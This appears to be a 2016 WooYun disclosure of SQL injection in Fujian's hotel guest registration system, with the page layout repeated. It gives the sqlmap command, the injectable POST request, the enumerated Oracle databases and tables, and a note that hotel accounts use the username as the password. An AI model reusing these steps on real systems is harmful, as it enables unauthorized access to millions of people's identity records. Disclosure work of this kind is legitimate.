福建省住宿人员采集系统SQL注射（涉及几百万个人详细开房信息/涉及全省6W+旅馆账号及信息/Oracle涉及31库）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0190454

漏洞标题：福建省住宿人员采集系统SQL注射（涉及几百万个人详细开房信息/涉及全省6W+旅馆账号及信息/Oracle涉及31库）

漏洞作者： king7

提交时间：2016-03-29 17:06

修复时间：2016-05-14 09:40

公开时间：2016-05-14 09:40

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(公安部一所)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2016-03-29：细节已通知厂商并且等待厂商处理中
2016-03-30：厂商已经确认，细节仅向厂商公开
2016-04-09：细节向核心白帽子及相关领域专家公开
2016-04-19：细节向普通白帽子公开
2016-04-29：细节向实习白帽子公开
2016-05-14：细节向公众公开

简要描述：

详细说明：

http://**.**.**.**/szpt/web/localpwd.jsp

http://**.**.**.**/szpt/web/localpwd.jsp

找回密码处，手机号and验证码均存在注入，这里使用*强制注入手机号，

sqlmap.py -r e:\1.txt --random-agent --proxy=**.**.**.**:8080

使用随机agent+proxy,经过漫长时间注入，把战果整理一下
涉及福建省，几百万人开房记录包含详细的身份证件信息。
涉及到全省十几万家旅馆，账号全部采用数字编号，200X,200X+1,user=pass,这里可用8148，8148登录，但是由于要安装控件，才能显示全部内容，我就不安装了...
这种旅馆采集系统也不是第一次报了，但是危害确实很大，估计近期的开房库一部分来源于采集系统。
数据注入较慢，选了几个数量较多，较为敏感的做了采集。
只证明，不做任何其他处理。

漏洞证明：

POST /szpt/web/register_save.jsp HTTP/1.1
Host: **.**.**.**
Content-Length: 109
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://**.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded
Referer: http://**.**.**.**/szpt/web/register.jsp
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=0001aYp9x5f9z631KOKazQYSyTs:-10HHS9
c_mobileno=*&session_mobileno=1234&c_pwd=123456a&c_pwd2=123456a&c_xm=&c_pid=&c_addr=&c_qq=&c_mail=

POST包

available databases [31]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SM2100
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TC_BBS
[*] TC_COMMON
[*] TC_DWGL
[*] TC_JCYW
[*] TC_JWS
[*] TC_PORTAL
[*] TC_RKXT
[*] TC_SJZH
[*] TC_SZPT
[*] TC_TOOLS
[*] TC_WBLK
[*] TC_WEBJJ
[*] TC_WORKFLOW
[*] TC_ZHYY
[*] TSMSYS
[*] WMSYS
[*] XDB
[*] XXZXDBA
[16:58:00] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 32 times
[16:58:00] [INFO] fetched data logged to text files under 'C:\Users\k\.sqlmap\output\**.**.**.**'

数据库结构

Database: TC_SZPT
[426 tables]
+---------------------------+
| A                         |
| AA                        |
| C                         |
| CDC_T_LGY_JNLK            |
| CJB                       |
| EMPLOYEE                  |
| JCJB                      |
| LSQ                       |
| PLAN_TABLE                |
| T                         |
| T_A                       |
| T_BACYJGZ_INFO            |
| T_BAK                     |
| T_BAY_DWXX                |
| T_BAY_TZJS                |
| T_BAY_TZZB                |
| T_BA_BAJGB                |
| T_BA_BAPX                 |
| T_BA_BAYSWJBXX            |
| T_BA_BAY_FWDX             |
| T_BA_CYQK                 |
| T_BA_CYRYKCCXX            |
| T_BA_CYRYRZXX             |
| T_BA_DWXX_OTHER           |
| T_BA_FFHTXX               |
| T_BA_FFQK                 |
| T_BA_FGSJBXX              |
| T_BA_FWDX                 |
| T_BA_FWGSCJR              |
| T_BA_FWQY_BA              |
| T_BA_FWQ_TMP              |
| T_BA_GZLWGL               |
| T_BA_JYB                  |
| T_BA_KQJY                 |
| T_BA_KSBMB                |
| T_BA_KSBMB_0730           |
| T_BA_KSBMB_BAK            |
| T_BA_KSBMB_OLD            |
| T_BA_KSCJ                 |
| T_BA_LEAVEANDDUTY         |
| T_BA_PHOTO_TMP            |
| T_BA_POLICE               |
| T_BA_POLICE_BAJG          |
| T_BA_PXKC                 |
| T_BA_QZSY_BA              |
| T_BA_RYB                  |
| T_BA_RYJCB                |
| T_BA_RYPXB                |
| T_BA_RYSWB                |
| T_BA_TS                   |
| T_BA_TSXX                 |
| T_BA_USER                 |
| T_BA_WZYY                 |
| T_BA_XYB                  |
| T_BA_YJT_KQ               |
| T_BA_YYCD                 |
| T_BA_ZB_CAR               |
| T_BA_ZB_COMPUTER          |
| T_BA_ZB_GUN               |
| T_BA_ZB_GUN_LYRK          |
| T_BA_ZB_OTHER_DEVICE      |
| T_BA_ZB_OTHER_JYGH        |
| T_BA_ZXZYBA_TMP           |
| T_CAR                     |
| T_CFG_JC_USER             |
| T_CHECK_LGY_ZRQ           |
| T_CL_CLCCXX               |
| T_CL_CLCCXX_ZB            |
| T_CL_CLXX_BAK150806       |
| T_CL_CLYYXX               |
| T_CL_CLYYXX_ZB            |
| T_CL_FEE                  |
| T_CL_FEE_TYPE_CONFIG      |
| T_CL_FKYJ                 |
| T_CL_HCXX                 |
| T_CL_KHXX                 |
| T_CL_PHOTO                |
| T_CZW_USER                |
| T_CZW_USER1107            |
| T_CZW_USER_BAK            |
| T_CZW_USER_LOG            |
| T_DD_CORP_SET             |
| T_DD_DDRY_PHOTO           |
| T_DD_DDWPTZ_PHOTO         |
| T_DD_DDWP_PHOTO           |
| T_DD_MCDP                 |
| T_DD_PAWNCHILD            |
| T_DD_PAWNCHILD_TEMP       |
| T_DD_PAWNMAIN             |
| T_DD_PAWNMAN              |
| T_DD_PAWNREDEEM           |
| T_DD_PAWN_CONTINUE        |
| T_DD_TICKET               |
| T_DKQ_ID                  |
| T_DKQ_IDBACK              |
| T_FD_SEND_MESSAGE         |
| T_FJ_MISSIONARY           |
| T_FJ_SCRAP                |
| T_FJ_SCRAPMAN             |
| T_FJ_SCRAPTYPE            |
| T_FJ_SHADINESS            |
| T_FJ_SHOP                 |
| T_GZDX_CGXX               |
| T_GZDX_DOC_IN             |
| T_GZDX_DOC_OUT            |
| T_GZDX_DOSSIER            |
| T_GZDX_GLLB_ALTER         |
| T_GZDX_JGBJ               |
| T_GZDX_LGXX               |
| T_GZDX_QUXCUN             |
| T_GZDX_XD                 |
| T_GZDX_ZAGL               |
| T_HANZIWB                 |
| T_JIANCHA                 |
| T_JXQK                    |
| T_JXY_ACCIDENT            |
| T_JXY_ASSWITH             |
| T_JXY_CALLBACK            |
| T_JXY_CARINF              |
| T_JXY_CAR_PHOTO           |
| T_JXY_CLBK                |
| T_JXY_DRESSUP             |
| T_JXY_FITTING             |
| T_JXY_LOSECAR             |
| T_JXY_MATCHING_CARINF     |
| T_JXY_PJCK                |
| T_JXY_REPAIR              |
| T_JXY_RYBK                |
| T_JXY_SHADINESS           |
| T_JXY_STOPINF             |
| T_JXY_WFFZ                |
| T_JYZ_CYRYXX              |
| T_JYZ_DYXX                |
| T_JYZ_JYXX                |
| T_JYZ_KYQK                |
| T_JYZ_MONTH               |
| T_JYZ_POSSET              |
| T_JYZ_XCZPCJ              |
| T_JYZ_ZPXX                |
| T_KHXX                    |
| T_LDRK_ADDR               |
| T_LDRK_ADDR_BAK           |
| T_LDRK_ADDR_OLD           |
| T_LDRK_ADDR_PERMIT        |
| T_LDRK_ADDR_PERMIT_BAK    |
| T_LDRK_ADDR_PERMIT_BAK2   |
| T_LDRK_AJDC_MRTJ          |
| T_LDRK_AJRY_INFO          |
| T_LDRK_AJ_INFO            |
| T_LDRK_CARD               |
| T_LDRK_CARD_JX            |
| T_LDRK_CONFIG             |
| T_LDRK_CRBXX              |
| T_LDRK_FJGL               |
| T_LDRK_FWZXX              |
| T_LDRK_FWZ_QUXCUN         |
| T_LDRK_FWZ_QUXCUN_ZRQ     |
| T_LDRK_HOUSE              |
| T_LDRK_HOUSE_BAK1         |
| T_LDRK_HOUSE_CASE         |
| T_LDRK_HOUSE_CHECK        |
| T_LDRK_HOUSE_CZQK         |
| T_LDRK_HOUSE_CZQK_TMP     |
| T_LDRK_HOUSE_TMP          |
| T_LDRK_HOUSE_ZXYY         |
| T_LDRK_HOUSE_ZXYY_BAK     |
| T_LDRK_INFO               |
| T_LDRK_INFO_BZ            |
| T_LDRK_INFO_BZ_LS         |
| T_LDRK_INFO_BZ_TMP        |
| T_LDRK_INFO_BZ_TMP1       |
| T_LDRK_INFO_BZ_TMP1_BAK   |
| T_LDRK_INFO_TEMP          |
| T_LDRK_JKZ                |
| T_LDRK_LKBD               |
| T_LDRK_LOG                |
| T_LDRK_MSG                |
| T_LDRK_PERSON             |
| T_LDRK_PERSON_LS          |
| T_LDRK_QUXCUN             |
| T_LDRK_QUXCUN_20110702    |
| T_LDRK_QUXCUN_BAK         |
| T_LDRK_RZXX               |
| T_LDRK_SCHOOL             |
| T_LDRK_SHOUJI             |
| T_LDRK_SSFWXX             |
| T_LDRK_SYXX               |
| T_LDRK_SYZT               |
| T_LDRK_TBSJ_LOG           |
| T_LDRK_TOPONYM            |
| T_LDRK_UNIT_INFO          |
| T_LDRK_UNIT_TMP           |
| T_LDRK_XDET               |
| T_LDRK_XDET_LS            |
| T_LDRK_YWJ                |
| T_LDRK_ZRQ                |
| T_LGY_CARDNO              |
| T_LGY_ERR                 |
| T_LGY_FJLX                |
| T_LGY_FJXX                |
| T_LGY_JKLK                |
| T_LGY_JNLK20130609        |
| T_LGY_JNLK_0531           |
| T_LGY_JNLK_20130531       |
| T_LGY_JNLK_BHZF           |
| T_LGY_JNLK_HIS            |
| T_LGY_JNLK_JK             |
| T_LGY_JNLK_JK0913         |
| T_LGY_JNLK_NEW            |
| T_LGY_JNLK_OLD            |
| T_LGY_JNLK_SM             |
| T_LGY_JNLK_TRAN_TF        |
| T_LGY_JNLK_UPDATE1        |
| T_LGY_JNLK_UPDATE_BAK     |
| T_LGY_JNLK_UPDATE_NEW     |
| T_LGY_JNLK_WTF            |
| T_LGY_JWLK                |
| T_LGY_JWLK_BHZF           |
| T_LGY_JWLK_JK             |
| T_LGY_JWLK_SM             |
| T_LGY_KYRY                |
| T_LGY_KYRY_LG             |
| T_LGY_LCXX                |
| T_LGY_LGRZPXB             |
| T_LGY_LGYJ                |
| T_LGY_LG_JQM              |
| T_LGY_LKXX_HF             |
| T_LGY_MZTYW               |
| T_LGY_PIC_BORN            |
| T_LGY_PIC_INCISE          |
| T_LGY_RZFJ                |
| T_LGY_SCJL                |
| T_LGY_SFZ_DZ              |
| T_LGY_SYXX                |
| T_LGY_TD                  |
| T_LGY_TDCY                |
| T_LGY_TRANTIME            |
| T_LGY_TRANTIME_LG         |
| T_LGY_TZJS                |
| T_LGY_TZZB                |
| T_LGY_USER_CFG            |
| T_LGY_WCL                 |
| T_LGY_WKDZ                |
| T_LGY_WTF                 |
| T_LGY_WZJLK               |
| T_LOGIN_LOG               |
| T_LYS                     |
| T_MOBILE_CAPTURE          |
| T_MOBILE_CORP_INF         |
| T_MOBILE_DEAL             |
| T_MOBILE_INF              |
| T_MOBILE_ROB              |
| T_MOBILE_SHADINESS        |
| T_MOBILE_SJPPXH           |
| T_NAME_COUNT              |
| T_NB_BMXX                 |
| T_NB_CLCRXX               |
| T_NB_JCZGXX               |
| T_NB_KYXXSB               |
| T_NB_RYCLXX               |
| T_NB_WPCRXX               |
| T_NB_ZZWFXWXX             |
| T_NEWS                    |
| T_NOTICE                  |
| T_OCR_SBJG                |
| T_ORG                     |
| T_ORG_BAK                 |
| T_ORG_BAK1                |
| T_ORG_PZ                  |
| T_ORG_SZ                  |
| T_ORG_SZ_BAK1             |
| T_PHOTO                   |
| T_PHOTO_SM                |
| T_PHOTO_TMP               |
| T_PINYIN                  |
| T_PR_CAR                  |
| T_PR_CAR_GUN              |
| T_PR_CYRY                 |
| T_PR_FWDX                 |
| T_PR_GUN                  |
| T_PR_OTHER_DEVICE         |
| T_PR_SQL                  |
| T_PSN_CHARACTER           |
| T_PSN_ZRQ                 |
| T_PUBLIC_AJAX             |
| T_PUBLIC_MENU             |
| T_PUBLIC_MESSAGE          |
| T_PUBLIC_MESSAGE_REPLAY   |
| T_PUBLIC_NOTICE           |
| T_PUB_FBHYLXGL            |
| T_PUB_FBHYXX              |
| T_PUB_FBLXGL              |
| T_PUB_KYQK                |
| T_PUB_KYRY                |
| T_PUB_KYWP                |
| T_QSYZK_JOB               |
| T_REG_USER_SESSION        |
| T_SB_PACKAGE              |
| T_SCRAPTYPE               |
| T_SHOUDERMARK_ORDERDEL    |
| T_SHOULDERMARK_LEVEL      |
| T_SMS_TEL                 |
| T_SMS_YYB                 |
| T_SORT_MENU               |
| T_SWAP_CFG                |
| T_SWAP_MON                |
| T_TABLES                  |
| T_TEMP                    |
| T_TEST                    |
| T_TEST_TS                 |
| T_TMP                     |
| T_TMP1                    |
| T_TRANTIME_NB             |
| T_TRI_ERROR               |
| T_UNIFORM_ORDER           |
| T_UNIFORM_ORDER_DETAIL    |
| T_UPDATE_LOG              |
| T_USERS_SZ                |
| T_USERS_SZ_BAK            |
| T_USER_BAK                |
| T_USER_ERR                |
| T_USER_SZ                 |
| T_USER_TYRZ               |
| T_WB_DW                   |
| T_WB_KPDW                 |
| T_WB_KPDW_BAK             |
| T_WB_KPTJ                 |
| T_WEIBO_FANS_TMP          |
| T_WEIBO_LOGIN_LOG         |
| T_WEIBO_TJ                |
| T_WEIXIN_EVENT            |
| T_WEIXIN_GD_MESSAGE       |
| T_WEIXIN_GOOD             |
| T_WEIXIN_IMAGE            |
| T_WEIXIN_JSTOKEN          |
| T_WEIXIN_LOG              |
| T_WEIXIN_MENU             |
| T_WEIXIN_SEND             |
| T_WEIXIN_TEL              |
| T_WEIXIN_TOKEN            |
| T_WEIXIN_XIANSHUO         |
| T_WEIXIN_XIANSHUO_HCQK    |
| T_WEIXIN_XIANSHUO_MAP     |
| T_WEIXIN_XIANSHUO_MESSAGE |
| T_WK_REGION_CONFIG        |
| T_WTFK_WT                 |
| T_WTFK_WT_HH              |
| T_WWFW_SFZ_ZJSL           |
| T_WW_ORG                  |
| T_WW_QX_ROLEINFO          |
| T_WW_QX_USERPRIVS         |
| T_WW_ROLE_MENU            |
| T_WW_USER                 |
| T_WXP_DETAIL              |
| T_WXP_LQXX                |
| T_WXP_QTLK                |
| T_WXP_WPCK                |
| T_WXP_WPLK                |
| T_XGY_CJDW                |
| T_XGY_HOUSE               |
| T_XGY_MACHINE_INFO        |
| T_XGY_SYRK                |
| T_YHXX_SZ                 |
| T_YIREN_DEAL              |
| T_YL_AQJCSBXX             |
| T_YL_BAFFHTXX             |
| T_YL_BAHTZP               |
| T_YL_BAXX                 |
| T_YL_BCBAXX               |
| T_YL_BGDM                 |
| T_YL_BLDSJKSBXX           |
| T_YL_BWLCXX               |
| T_YL_CYRYICKSLXX          |
| T_YL_CYRYICKSLXX_BAK      |
| T_YL_CYRYKCCXX            |
| T_YL_CYRYRZXX             |
| T_YL_CYRYTJXX             |
| T_YL_DZYXJXX              |
| T_YL_GWXX                 |
| T_YL_ICKNJ                |
| T_YL_JYXKZXX              |
| T_YL_PMTXX                |
| T_YL_ROLE_CJD_CS          |
| T_YL_TJCLXX               |
| T_YL_WGTZZXX              |
| T_YL_YLFWCSCJDXX          |
| T_YL_YLFWCSYYRZXX         |
| T_YL_YLTJBJ               |
| T_YL_YLTJCF               |
| T_YL_YLTJCFRY             |
| T_YL_YLTJCS               |
| T_YL_YLTJFA               |
| T_YL_YLTJRY               |
| T_YSY_AWARD               |
| T_YSY_CERTIFICATE         |
| T_YSY_EMPLOYEE            |
| T_YSY_FOREIGNPRINT        |
| T_YSY_INDUSTRY            |
| T_YSY_INVESTOR            |
| T_YSY_MASTERFINANCE       |
| T_YSY_OTHERPRINT          |
| T_YSY_OTHERPRINTDEVICE    |
| T_YSY_PACKINF             |
| T_YSY_PERMITCARD          |
| T_YSY_PRINAPPLY           |
| T_YSY_PRINTDEVICE         |
| T_YSY_QUALITY             |
| T_YSY_RESOURCEPRINT       |
| T_YSY_ZIDIAN              |
| T_ZD_GWXX                 |
| T_ZD_XTMC                 |
| T_ZHYY_DWTJ               |
| T_ZHYY_PDSZ               |
| T_ZK_PLAN_TABLE           |
| T_ZK_QSY                  |
| T_ZK_QSYZK_JOB            |
| T_ZK_QSY_BAK              |
| T_ZK_QSY_CHECK_INFO       |
| T_ZK_QSY_CHILDREN         |
| T_ZK_QSY_RELATION_PSN     |
| T_ZK_QSY_SWAP             |
| T_ZK_ZKXX                 |
| T_ZXJSBR_PHOTO_ALTER      |
| V_FOREIGNER_ZZRY          |
| ZK_NOTICE_PHOTO           |
| ZK_PHOTO                  |
+---------------------------+

当前库

修复方案：

版权声明：转载请注明来源 king7@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：10

确认时间：2016-03-30 09:31

厂商回复：

非常感谢！
你提交的漏洞已验证，会尽快修复。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0190454

漏洞标题：福建省住宿人员采集系统SQL注射（涉及几百万个人详细开房信息/涉及全省6W+旅馆账号及信息/Oracle涉及31库）

相关厂商：福建省住宿人员采集系统

漏洞作者： king7

提交时间：2016-03-29 17:06

修复时间：2016-05-14 09:40

公开时间：2016-05-14 09:40

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(公安部一所)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 king7@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0190454

漏洞标题：福建省住宿人员采集系统SQL注射（涉及几百万个人详细开房信息/涉及全省6W+旅馆账号及信息/Oracle涉及31库）

相关厂商：福建省住宿人员采集系统

漏洞作者： king7

提交时间：2016-03-29 17:06

修复时间：2016-05-14 09:40

公开时间：2016-05-14 09:40

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(公安部一所)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2016-0190454"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 king7@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：